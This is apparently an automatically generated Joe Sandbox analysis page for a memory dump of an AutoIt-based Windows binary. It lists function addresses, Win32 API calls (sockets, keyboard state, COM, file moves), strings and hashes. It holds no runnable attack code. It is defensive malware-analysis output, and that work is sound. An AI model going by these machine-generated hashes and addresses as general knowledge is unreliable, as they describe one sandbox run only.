Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 4edae1c16d73b0fe44776dbb15107acc26dd12a860d02b0c3e22e159ab22253b
Instruction ID: 75cdd892b4ff969b639262923ba7d05d31b881fecf8f2b09ac49b363e691ff92
Opcode Fuzzy Hash: 4edae1c16d73b0fe44776dbb15107acc26dd12a860d02b0c3e22e159ab22253b
Instruction Fuzzy Hash: 46916C756083419FCB04DF28C49196AB7E4FF89714F14892EF8899B351DB30EE49CBA2

Function 00DD4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00DB000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
Part of subcall function 00DB000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
Part of subcall function 00DB000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
Part of subcall function 00DB000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DD4C51
_wcslen.LIBCMT ref: 00DD4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DD4DCF
CoTaskMemFree.OLE32(?), ref: 00DD4DDA

Strings

NULL Pointer assignment, xrefs: 00DD4E23, 00DD4E52

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 6935e35a6ba28070989231948061a8d42a378651af65c0f9b2a7b72987e0097b
Instruction ID: 0590f29f384ae75b6a21b930df29c558c46e1247dc77c0205b7d7bdf66b1a5fd
Opcode Fuzzy Hash: 6935e35a6ba28070989231948061a8d42a378651af65c0f9b2a7b72987e0097b
Instruction Fuzzy Hash: B591E771D00219EFDF14DFA4C891AEEBBB9FF08310F10856AE919A7251EB309A458F70

Function 00DE20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00DE2183
GetMenuItemCount.USER32(00000000), ref: 00DE21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DE21DD
_wcslen.LIBCMT ref: 00DE2213
GetMenuItemID.USER32(?,?), ref: 00DE224D
GetSubMenu.USER32(?,?), ref: 00DE225B

Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DE22E3

Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 4a4f41f0520dc2c71fb3e1b87699eb0c97ed47d84bd06ab5c8aae56d6e4934b4
Instruction ID: 07b012342e2c9522ee557e8920105d3838f70827aa8b8083864f9bf178ef7f2c
Opcode Fuzzy Hash: 4a4f41f0520dc2c71fb3e1b87699eb0c97ed47d84bd06ab5c8aae56d6e4934b4
Instruction Fuzzy Hash: 7A718D75A00245AFCB10EF65C881ABEBBF9EF88310F148459E956EB351D734EE418BB0

Function 00DBAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00DBAEF9
GetKeyboardState.USER32(?), ref: 00DBAF0E
SetKeyboardState.USER32(?), ref: 00DBAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00DBAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00DBAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00DBAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DBB020

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c0107476f00ff6db99a250ba29e9ae5df10cb71c7d2fe059014c5c7e13588d10
Instruction ID: 0468723955138e10df5c478eed4780de067c150e5a92379733b168ed8266a378
Opcode Fuzzy Hash: c0107476f00ff6db99a250ba29e9ae5df10cb71c7d2fe059014c5c7e13588d10
Instruction Fuzzy Hash: C551C1A0A047D5BDFB3652388845BFABEA95F06314F0C848AF1DA854D2C3D9EC88D771

Function 00DBACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00DBAD19
GetKeyboardState.USER32(?), ref: 00DBAD2E
SetKeyboardState.USER32(?), ref: 00DBAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DBADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DBADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DBAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DBAE38

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c9b581b188e6de1215c87951d60f5d37d87aed04918b418b56eb2737bc549202
Instruction ID: 67eccbd4f1205c0981d14310e1165620819704153fa520268738695d25332906
Opcode Fuzzy Hash: c9b581b188e6de1215c87951d60f5d37d87aed04918b418b56eb2737bc549202
Instruction Fuzzy Hash: 9551C5A16047D5BDFB3783288C95BFA7E995B46300F0C8589F1D64A8D2D294EC84D772

Function 00D8542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00D93CD6,?,?,?,?,?,?,?,?,00D85BA3,?,?,00D93CD6,?,?), ref: 00D85470
__fassign.LIBCMT ref: 00D854EB
__fassign.LIBCMT ref: 00D85506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00D93CD6,00000005,00000000,00000000), ref: 00D8552C
WriteFile.KERNEL32(?,00D93CD6,00000000,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D8554B
WriteFile.KERNEL32(?,?,00000001,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D85584

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3d96f58942765c4a048c2b9c305181ee01b14db6e406ec88b6d5da4809bede31
Instruction ID: 36e11d9288c1d6f6f8f347754b4f041f25cc2885384d9157adb171ddb41c17b9
Opcode Fuzzy Hash: 3d96f58942765c4a048c2b9c305181ee01b14db6e406ec88b6d5da4809bede31
Instruction Fuzzy Hash: 7E51A071A00649AFDB11DFA8E885AEEBBF9EF09300F14415AE955E7291E730DA41CB70

Function 00D72D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D72D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00D72D53
_ValidateLocalCookies.LIBCMT ref: 00D72DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00D72E0C
_ValidateLocalCookies.LIBCMT ref: 00D72E61

Strings

csm, xrefs: 00D72DF6

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e80ef6aaa65c1a479088365279a1472940456140e0e7c76e13dde99fd6c03df8
Instruction ID: d2d8aeb2a909eaab94e247c335449b9c36de3ac7947b1bd01d54523bf81b442b
Opcode Fuzzy Hash: e80ef6aaa65c1a479088365279a1472940456140e0e7c76e13dde99fd6c03df8
Instruction Fuzzy Hash: 7B417234E002499BCF10DF68C855AAEBBA5EF44324F18C155E818AB352E731EA45CBF1

Function 00DD10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
Part of subcall function 00DD304E: _wcslen.LIBCMT ref: 00DD309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DD1112
WSAGetLastError.WSOCK32 ref: 00DD1121
WSAGetLastError.WSOCK32 ref: 00DD11C9
closesocket.WSOCK32(00000000), ref: 00DD11F9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: c3feab846b0fa5dd7f3ec1180fe5d245e1ff7a12d3741dce501d36c5746369cb
Instruction ID: 76f0152226d44c9bc7bbf329c0aa83965366247856db73a6e7ecc8665b5cb0de
Opcode Fuzzy Hash: c3feab846b0fa5dd7f3ec1180fe5d245e1ff7a12d3741dce501d36c5746369cb
Instruction Fuzzy Hash: 5A41C035600314AFDB10AF64CC84BAABBA9EF45324F18805AFD559B391C770ED45CBB1

Function 00DBCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD

Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16

lstrcmpiW.KERNEL32(?,?), ref: 00DBCF45
MoveFileW.KERNEL32(?,?), ref: 00DBCF7F
_wcslen.LIBCMT ref: 00DBD005
_wcslen.LIBCMT ref: 00DBD01B
SHFileOperationW.SHELL32(?), ref: 00DBD061

Strings

\*.*, xrefs: 00DBCFF3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 1d9e8d3bb0a41c226d2fdc51397482f6ffe9eb74d2f0df1fef71e6194c2ce74c
Instruction ID: 9643b0e8681d861207a2c1639846e3245b9261d400b00d8aa75cfc499d6664e0
Opcode Fuzzy Hash: 1d9e8d3bb0a41c226d2fdc51397482f6ffe9eb74d2f0df1fef71e6194c2ce74c
Instruction Fuzzy Hash: 27416971946218DFDF12EFA4C981AEDB7B9EF48380F1400E6E54AEB141EB34A645CB70

Function 00DE2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DE2E1C
GetWindowLongW.USER32(?,000000F0), ref: 00DE2E4F
GetWindowLongW.USER32(?,000000F0), ref: 00DE2E84
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DE2EB6
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DE2EE0
GetWindowLongW.USER32(?,000000F0), ref: 00DE2EF1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE2F0B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
Instruction ID: a8b386ffd5cf873e77fa708d3c0d90e1582e2896bd57cfb5359228b2d42e4f12
Opcode Fuzzy Hash: 2cf93350ae00847b62b9907507c001ce672745e65fa5a24a2e99ae31941e51ab
Instruction Fuzzy Hash: 9C3116306042A09FDB21AF1ADC85F6637E8EB9AB10F1801A4F904DF2B1CB71AC459B61

Function 00DB7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB778F
SysAllocString.OLEAUT32(00000000), ref: 00DB7792
SysAllocString.OLEAUT32(?), ref: 00DB77B0
SysFreeString.OLEAUT32(?), ref: 00DB77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00DB77DE
SysAllocString.OLEAUT32(?), ref: 00DB77EC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c1cb16e8967e64ba5287d9d5704b811a6212f73a6a928d264cab84ac10e8551a
Instruction ID: a78359824be05b500d54787669f2b0570fff67b4350cd2dc62b22b637e310054
Opcode Fuzzy Hash: c1cb16e8967e64ba5287d9d5704b811a6212f73a6a928d264cab84ac10e8551a
Instruction Fuzzy Hash: C421B276604219AFDB10EFA8DC88CFB77ACEB49764B548025F915DF291DA70EC4287B0

Function 00DB77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB7868
SysAllocString.OLEAUT32(00000000), ref: 00DB786B
SysAllocString.OLEAUT32 ref: 00DB788C
SysFreeString.OLEAUT32 ref: 00DB7895
StringFromGUID2.OLE32(?,?,00000028), ref: 00DB78AF
SysAllocString.OLEAUT32(?), ref: 00DB78BD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0f5ecbfbc1a8f1bb5cafc61b41421dc6224deb73d90dbed87057ade0e42310e5
Instruction ID: 25d83ac7b6cfd4d29fd741e9177dca20fdd3cb845d1e931a7e1ff043c2d7c12f
Opcode Fuzzy Hash: 0f5ecbfbc1a8f1bb5cafc61b41421dc6224deb73d90dbed87057ade0e42310e5
Instruction Fuzzy Hash: BE215036608204EFDB10AFB8DC8CDAA77ECEB497607548125F916CB2A1DA74EC41DB74

Function 00DC04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00DC04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC052E

Strings

nul, xrefs: 00DC0567

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a1d61b5e97f02c9811209d4cad8984b8e4ca6e5a92cd9cad84885aede6c30fe1
Instruction ID: a1a53fc98210e13e962cf9992d75facb777e6198d145ad903e8a73c1857af24e
Opcode Fuzzy Hash: a1d61b5e97f02c9811209d4cad8984b8e4ca6e5a92cd9cad84885aede6c30fe1
Instruction Fuzzy Hash: 5F211775610306EBDF209F69D844F9A7BB8AF44724F244A1DE9A1E72E0E7709942CF30

Function 00DC05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00DC05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DC0601

Strings

nul, xrefs: 00DC0639

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b6689bea471bc6207fd23f8abd06feda994de8edfd127c86200e3c14d3ffd11b
Instruction ID: be112b2049eff062652f5ec11a3aea92190e8da1d8f519471c4203a2fe51b517
Opcode Fuzzy Hash: b6689bea471bc6207fd23f8abd06feda994de8edfd127c86200e3c14d3ffd11b
Instruction Fuzzy Hash: 12218E75540316DBDB209F698C44F9A7BE8AF95B20F240A1DF9A1E72E0D7B09861CB30

Function 00DE40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DE4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DE411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DE412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DE4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DE4145

Strings

Msctls_Progress32, xrefs: 00DE40E3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 84adedc05ce015779ad8893962de963190292fa3464f79b8ac8f332f396243d0
Instruction ID: ba8cd18ef22bf821f8a0a5132dfe8820f74087bd2a621b47030a6404c35e16d3
Opcode Fuzzy Hash: 84adedc05ce015779ad8893962de963190292fa3464f79b8ac8f332f396243d0
Instruction Fuzzy Hash: 7711E2B2140219BEEF109F65CC81EE77FADEF08798F004110BA18E2190C672DC21DBB0

Function 00D8D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D8D7A3: _free.LIBCMT ref: 00D8D7CC

_free.LIBCMT ref: 00D8D82D

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D8D838
_free.LIBCMT ref: 00D8D843
_free.LIBCMT ref: 00D8D897
_free.LIBCMT ref: 00D8D8A2
_free.LIBCMT ref: 00D8D8AD
_free.LIBCMT ref: 00D8D8B8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

